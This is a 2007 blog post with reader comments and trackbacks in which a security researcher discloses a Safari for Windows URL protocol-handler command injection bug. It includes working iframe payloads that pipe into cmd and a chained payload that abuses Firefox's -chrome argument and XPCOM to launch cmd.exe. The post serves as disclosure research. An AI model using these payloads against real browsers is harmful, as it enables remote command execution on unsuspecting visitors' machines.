Apple released version 3 of their popular Safari web browser today, with the added twist of offering both an OS X and a Windows version. Given that Apple has had a lousy track record with security on OS X, in addition to a hostile attitude towards security researchers, a lot of people are expecting to see quite a number of vulnerabilities targeted towards this new Windows browser.
I downloaded and installed Safari for Windows 2 hours ago, when I started writing this, and I now have a fully functional command execution vulnerability, triggered without user interaction simply by visiting a web site. I will not sell this one to ZDI or iDefense but instead release it here, as I have done lately with a number of 0day vulnerabilities. This place is where you get my latest research 
A bunch of other security researchers such as David Maynor and Aviv Raff have been pounding safariWin with their fuzzing tools, going through thousands upon thousands of test pages in the hopes of triggering some form of memory corruption for potential exploitation. I am a big fan of fuzzing and believe it can produce some tremendous results, but sometimes good old fashioned application specific knowledge can get you far.
The logic behind this vulnerability is quite simple and the vulnerability class has been known and understood for years, namely that of protocol handler command injection. A browser typically consists of a multitude of different URL schemes, some of which are handled by internal functions and others that are handed off to external applications. On the OS X platform Apple has enjoyed the same luxury and the same curse as Internet Explorer has had on the Windows platform, namely intimate operating system knowledge. The integration with the originally intended operating system is tightly defined, but the breadth of knowledge is crippled when the software is released on other systems and mistakes and mishaps occur. You can still find references to the OS X proprietary URL protocols open-help-anchor: and network-diagnostics: inside the resource files for the Windows release.
URL protocol handlers on the Windows platform work by executing a process with specific command line arguments. When Apple released Safari for the Windows platform they neglected to implement a proper level of input validation for these arguments, which means that you can break out of the intended confines and wreak havoc. A typical request for a URL such as myprotocol://someserver.com/someargument would be turned into a command line resembling the following.
“C:\Program Files\My Application\myprotocol.exe” “someserver.com/someargument”
This works almost as expected in Safari. With a simple link you cannot pass along arbitrary characters to the command line which is later executed and most attempts at doing so will simply be URL escape, such that myprotocol://someserver.com/some"[SPACE]argument is turned into
“C:\Program Files\My Application\myprotocol.exe” “someserver.com/some”%20argument
This cannot be used to exploit Safari as the command line to be executed is simply invalid. However, Safari does not properly validate the input when these same requests are handled through IFRAME elements, such as
<iframe src=’myprotocol://someserver.com” < foo > bar | foobar “arg1′></iframe>
which is turned into the following command line.
“C:\Program Files\My Application\myprotocol.exe” “someserver.com” < foo > bar | foobar “arg1″
As the knowledgeable reader might have noticed we now have everything we need to implement an attack against the entire range of available URL protocol handlers on the Windows platform. We could pick the telnet or callto protocols and provide unfiltered input to an argument of our choice. For this demonstration I have opted to attempt an exploit against the gopher: URL protocol which is handled by my local Firefox installation. We hash together an example request..
<iframe src=’gopher://larholm.com” |cmd /c echo “FOO’></iframe>
..Fire up procexp, launch safari and watch the output.
“C:\PROGRA~1\MOZILL~3\FIREFOX.EXE” -url “gopher://larholm.com” |cmd /c echo “FOO” -requestPending
Now this might be fun enough, but what if we wanted something a bit more customizable? Firefox is built on top of the Mozilla XPCOM platform and we might as well use some of these capable interfaces at our disposal to handle process instantiation. The code we want to execute is the following.
C=Components.classes;I=Components.interfaces;
file=C[’@mozilla.org/file/local;1′].createInstance(I.nsILocalFile);
file.initWithPath(’C:\\windows\\system32\\cmd.exe’);
process=C[’@mozilla.org/process/util;1′].createInstance(I.nsIProcess);
process.init(file);
process.run(true,{},0);
alert(process);
Due to the levels of URL escaping the following might be a bit confusing to read, but feel free to dissect it for your own variations.
<iframe src='gopher://larholm.com" -chrome "javascript:C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:'+String.fromCharCode(92)
+String.fromCharCode(92)+'Windows'
+String.fromCharCode(92)+String.fromCharCode(92)+'System32'
+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,{},0);alert(process)'></iframe<
And there you have it, command execution. A fully functional PoC exploit is located below. Warning: This WILL crash your Safari browser on Windows. Close any existing Firefox processes that you might currently be running, then navigate Safari to the following page.
http://www.larholm.com/vuln/safaripoc.html
The above PoC exploit will exploit Safari by bouncing through Firefox via the Gopher protocol, passing on unfiltered input for the -chrome argument that Firefox exposes. When it has done this it will launch C:\Windows\System32\cmd.exe with any arguments that have been specified in the call to the process.run method.
It is important to know that, even though this PoC exploit uses Firefox, the actual vulnerability is within the lack of input validation for the command line arguments handed to the various URL protocol handlers on your machine. As such, there are a lot of different attack vectors for this vulnerability, I simply chose Firefox and the Gopher URL protocol because I was familiar with these.
I hope you enjoyed the fruits of my 2 hours of labour. Please feel free to add my RSS feed to your reader and come back again tomorrow or next week for a fresh batch of 0day vulnerabilities
Cheers
Thor Larholm
UPDATE
The site was down for a couple of hours due to Slashdot, TechMeme and Reddit.
You might want to consider disabling the smart quote BS for posts that contain code fragments, as it is sort of hard to decipher what “C:\PROGRA~1\MOZILL~3\FIREFOX.EXE” -url “gopher://larholm.com” |cmd /c echo “FOO” results in - e.g. what happens to the cmd that is unmentioned in the accompaning text…
[…] Bah. Hardly a day has gone by and the bugs are coming out to roost. Larholm.com - Me, myself and I ? Safari for Windows, 0day exploit in 2 hours And here is one from Maynor (the guy who Apple vilified). He says he isn’t going to report […]
Yes, Windows sucks. No safty at all.
It’s not clear to me whether one should ding the browser or the OS for this one. OS X has the same problem, albeit withthe potential at least of being somewhat safer as the normal UNIX “exec” runs programs without passing through shell argument evaluation.
It should not be the browser’s responsibility to keep track of which applications are safe to use as protocol handlers and which should be avoided. Either the operating system needs to provide an API for finding or calling protocol handlers that are designed to handle for untrusted requests, or the browser should maintain its own database of such safe protocol handlers and ignore the database provided by the operating system.
I suggested that this be fixed on OS X, at least, back in 2004: http://www.scarydevil.com/~peter/io/osx-security.html
Of course, Microsoft’s been sitting on far more serious design flaws since 1997, so I honestly don’t expect Apple to act on this one until at LEAST the end of the decade. If at all.
[…] Larholm?????????URL protocol handler command injection vulnerability???????????????? bug Safari windows ??? Jun 12, 2007 - […]
[…] well,i dont see any reason to replace FF. It crashed couple of times already.. Larholm.com - Me, myself and I ? Safari for Windows, 0day exploit in 2 hours Safari for Windows: Released and hacked in a day | InfoWorld | News | 2007-06-11 | By Robert […]
[…] laut hier und hier (Gefunden bei Slashdot) wurden in der Windows-Version schon Stunden nach dem erscheinen 4 DoS Bugs […]
[…] sebelum menggunakan produk ini di Windows, ada baiknya untuk membaca artikel yang mengatakan bahwa dia berhasil mencari bug di Safari for Windows dalam waktu 2 jam setelah di rilis. Kalo masih ragu, sebaiknya menunggu patch dari Apple (oia, kalo di MacBook “patch” […]
[…] URL protocol handler command injection vulnerability […]
I don’t know, the way you described it seems more like a hole in the way Windows handles things than a Safari hole. Does a Windows API call launch a shell process, or does Safari manually go and run a command line program? If it’s the Windows API for URL handling, then it’s clearly broken. Every program that needs to grab a URL should not be responsible for patching holes in Windows.
[…] 2: Thor Larholm has discovered a 0 day exploit in Safari within 2 hours of installing. Posted by Funtime on Tuesday, June 12, 2007, at 12:00 […]
Nice work! Both the thorough description and the fact that you decided to reveal it rather than just saying “nah-nah Apple, I pwnd ur borwser”. Should be interesting to see their reaction (and reaction time) on this.
Wow, amazing
I don’t like Safari on XP anyway, some pages don’t even render correctly… whatever. Thanks for the tip, I’m staying on Opera 
[…] “. Stesso modo di agire, differente persona, a due ore dal rilascio Thor Larholm, pubblica un interessante articolo in cui dimostra come Safari sia affetto da una vulnerabilità classe “URL protocol handler command […]
[…] Maybe if I read this beforehand I would have second thought about installing it… or maybe not. […]
really good stuff, thanks for your effort. Safari wasn’t careful enough to filter out improper inputs..and u proved it.cheers!
safaripoc.html crashes Safari 3 on Mac OS X too
[…] Thor Larholm fand einen Bug, mit dem Angreifer beliebigen Programmcode ausführen und somit Kontrolle über ein fremdes Windows-System verschaffen können. Dazu reicht lediglich der Aufruf einer präparierte Webseite. […]
Your exploit crashes safari 3 beat om the mac too (and opens firefox)
[…] Mehr dazu hier: larholm.com […]
[…] Errata Security managed to find 6 bugs in one afternoon, one of which they were able to weaponize. Thor Larholm has created a means of remote executing any code he desires, in a mere 2 […]
[…] otro lado Thor Larholm encontró una vulnerabilidad de inyección de código en el manejador de protocolos URL, que también permite ejecución remota de […]
[…] La doua ore, a aparut primul exploit. […]
Well… I’m not very surprised about this exploit - it’s a beta. But on the other hand it suckz alot that Apple released it that early. I wouldn’t recommend installing it anyway on Windows until it’s final.
[…] Safari coming to Windows (but apparantly it has serious security-flaws in it’s current state. More about that here, here and here). […]
[…] the same time Thor Larholm found a URL protocol handler command injection […]
[…] give it a whirl—if you have the time and the system resources. Always be on the lookout for security threats, […]
it crashes safari on the mac as well
Apple software just works doesnt it ?
Safari 3 Beta for Windows XP & Vista…
I prefer to wait for the final release version in October to know whether Safari is the faster web browser. For the time being, I?ll use a Safari theme on Firefox?…
[…] has released a brand new version of their Safari browser, and it only took 2 hours for someone to hack an exploit out for it. There are some good reviews around as to what makes the software so compelling, but you […]
It doesn’t crash Safari 2.0.4 (latest) on the Mac, but it opens Firefox nonetheless.
[…] mal 2 Stunden hat es gedauert, bis die erste Sicherheitsluecke in der Windows-Version von Safari 3 gefunden wurde. Und da sagt noch mal jemand, Apple-Software […]
[…] Larholm.com […]
[…] 4: Thor Larholm has also found a bug. http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/ I’d like to note that we found a totl of 6 bugs in an afternoon, 4 DoS and 2 remote code […]
[…] Sources: Errata Security | Larholm.com […]
[…] No sooner do I mention Safari on Windows and Niall goes off and finds someone’s zero day exploit […]
[…] 12 June 2007: Several security vulnerabilities have already been identified in the Safari/PC beta, so if you are […]
Mmhh, there is a EULA
IMPORTANT NOTE: THIS IS “BETA”, PRE-RELEASE, TIME-LIMITED SOFTWARE MEANT FOR EVALUATION AND DEVELOPMENT PURPOSES ONLY. THIS SOFTWARE SHOULD NOT BE USED IN A COMMERCIAL OPERATING ENVIRONMENT OR WITH IMPORTANT DATA. BEFORE INSTALLING THIS APPLE SOFTWARE, YOU SHOULD BACK UP ALL OF YOUR DATA AND REGULARLY BACK UP DATA WHILE USING THIS APPLE SOFTWARE.
Which pretty much implies it is risky to use the software. I usually do not see this in the standard software downloads.
They call it beta?
They will be thankful for your testing, even though they will not answser you. Free job for apple you do?
Not that I am against you. Just pointing out my feelings.
Pedro.
[…] Sicherheitsluecke in der Windows-Version von Safari gefunden, Apple ist unsicher […]
[…] Links:- Safari Beta 3 Download- Safari Beta 3 Plugins (Win)- Die Keynote- 0Day Exploit für Safari Windows […]
EULA’s are there to cover themselves leagally (which is good sense) but when you read the marketing drivel.
“Now you can enjoy worry-free web browsing on any computer. Apple engineers designed Safari to be secure from day one.”
they are kinda asking for it.
[…] (left) has released an advisory with proof-of-concept code to demo the vulnerability, which can be used to take complete control of […]
Hey, fine to now that my Safari is running on OSX wich is the most secure Operating System ever!!!!
NOT!!!
[…] Safari for Windows, 0day exploit in 2 hours [Larholm.com] tr { border: 0px } td { cellborder: 10px} table { border: 1px solid black } […]
Only Jobs wannabee fanboys will even try this.
Who gives a flying xxxx what apple does?
[…] […]
[…] Aviv Raff foi o primeiro. Depois foi a vez de David Maynor e Thor Larholm.. […]
[…] vulnerabilità (4 di tipo DoS e 2 remote execution) a poche ore dal lancio.La conferma arriva da più fonti indipendenti tra loro, andando a confermare la veridicità della notizia che Safari per Windows non sia nato […]
[…] Meldung Sicherheitsbugs Apples Browser Safari for Windows XP and Windows Vista: Link Link zum Sicherheitsexperten: Thorn Larholm Link zum Apple Safari Exploit: Link […]
[…] veteran security researcher Thor Larholm writes in his blog he found a 0day vulnerability within two hours. The flaw exists within how Safari handles URL […]
[…] veteran security researcher Thor Larholm writes in his blog he found a 0day vulnerability within two hours. The flaw exists within how Safari handles URL […]
[…] Well, the Safari browser for Windows was released yesterday and so far in less than 24 hours there have been several bugs discovered. (ex. 2) (ex. 3) […]
[…] mich aber besonders die Sicherheitslücken, die unter Windows eklatant sind. So gelang es etwa Tor Larholm bereits nach 2 Stunden eine Lücke zu finden mit der Angreifer auf dem System beliebigen Code […]
[…] Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious […]
[…] Thor Larholm who described himself as “a pretty ordinary guy from a small town in Denmark”, also downloaded and installed Safari for Windows on his PC. After a few hours of testing he found a serious bug: “I now have a fully functional command execution vulnerability, triggered without user interaction simply by visiting a web site.” […]
[…] Already someone has found a massive hole in Safari. Read more about it at larholm.com […]
[…] already 6 zero day exploits and many, many crashes for the browser. You can read about them here here here and here. Which makes the following image from the Apple website, borrowed from […]
[…] Ach, Safari? Ja! Safari 3 kommt natürlich mit Mac OS X 10.5 und auch für Windows XP und Vista. Ab sofort als Snapshot (offiziell eine Public Beta) für Windows zum Download erhältlich. Allerdings noch sehr instabil und crashed schon beim Aufruf von Google… anscheinend gibt es Probleme mit der deutschen Sprache bzw Fonts. Sicherheitslücken wurden auch schon 2 Std später in Safari für Windows entdeckt. […]
[…] a beta of Safari for Windows (I knew it! They’re porting iLife to Windows.). Guess what. Someone found a security exploit in only two hours. Can you believe that? Oh well, it’s a beta after all. digg_url = […]
[…] A Aviv Raff On, através de testes básicos de segurança, encontrou uma falha de corrupção de memória que pode ser explorada por usuários mal-intencionados. E não é só: algumas horas depois, mais falhas foram descobertas. […]
[…] Para finalizar, ainda um alerta aos utilizadores, particularmente os do Windows Vista, que eventualmente consigam instalar funcionalmente esta versão beta do Safari: ao que parece, a segurança deixa muitíssimo a desejar! […]
Good research, but what’s with this “lousy track record” and “hostile to expolits” BS? Come on man, lose the chip on the shoulder - it just looks unprofessional.
[…] Raff (Bugtraq ID: 24431). Apple Safari for Windows Memory Corruption Vulnerability by David Maynor. Apple Safari for Windows URL Protocol Handler Command Injection by Thor […]
[…] Kriptópolis leo que en sólo dos horas Thor Larholm ha reventado Safari 3 para Windows, tras comprobar que este navegador no valida bien las entradas que le llegan a través de elementos […]
[…] reports indicating that the browser presents a security risk to Windows users. Thor Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious […]
[…] Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious […]
[…] security researcher Thor Larholm wrote in his blog that he found a “0day” vulnerability in Safari within two hours. The flaw exists in how […]
[…] June 12th, 2007 [link][more] […]
[…] separate reports indicating that the browser presents a security risk to Windows users.Thor Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious code.David […]
[…] the new browser, officially still on beta-3, may not be as good as others. A zero-day exploit was revealed in a mere of two hours. Another bug was also discovered within a short period. These make IE looks […]
[…] people have not only found major bugs (which is expected from a beta), but also possibly exploitable bugs that could have major security […]
[…] famosos crashes e dois a permitirem a execução remota de código. Como não há duas sem três, Thor Larholm (cujo blog não consigo abrir à hora deste post) focou exactamente os mesmos […]
[…] Webbrowser now publicly available for beta testing. Some people downloaded it and it took them 2 hours to get a serious security hole which lets safari executing any program you’d like to. […]
[…] getting some criticism over security flaws made not so far after the release. Thor Larholm found a 0 day exploit that causes Safari to shut down whenever you visit a website containing the malicious code. David […]
[…] Thor Larholm […]
[…] del Safari para Windows que permitiría ejecuciones remotas de código. De igual forma Thor Larholm encontró otra más. Como que la gente de Cupertino no tuvo mucho tiempo de validar la seguridad del nuevo […]
[…] Maynor dichiara 6 bug scoperti in poche ore 4 sono DoS e 2 remote execution , mentre Thor Larholm ha pubblicato un exploit che chiude il browser visitando una pagina che sfrutta un ulteriore […]
[…] Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious […]
[…] qua e […]
[…] it’s release, there are already exploits circulating for Safari for Windows. Thor Larholm has discovered a remote command execution vulnerability and some other researchers have reportedly discovered more […]
[…] mult timp Safari pe Windows si nu este asa de stabil. Se pare ca nici prea sigur nu e din moment ce Thor Larholm a gasit in numai doua ore de la lansare un […]
[…] for full coverage. The main thing now is the bugs discovered in Safari for Windows. Tor Larholm at larholm.com found two within hours after the speech. David Maynor at Errata Security found six. At […]
[…] keeping track of a few announcements across the web, including a fully disclosed 0-day exploit that Thor Larholm apparently found yesterday within two hours of the software’s release (and says more are […]
[…] was released. David found 4 DoS bugs and 2 remote execution vulnerabilities, meanwhile Thor found a URL protocol handler command injection vulnerability that allows remote command execution and he wrote it will full description about the bug. If you […]
[…] An exploit has been found in the beta. Don’t use this for casual […]
[…] 2 Neben Darstellungsfehlern häufen sich mittlerweile auch die Bug-Reporte. Thor Larholm will bereits zwei Stunden nach der Veröffentlichung einen 0day-exploit für Safari 3 […]
Breaking stuff again, eh? :p
[…] hours later, Thor Larholm found a vulnerability which allows command execution to be run […]
[…] Safari for Windows, 0day exploit in 2 hours […]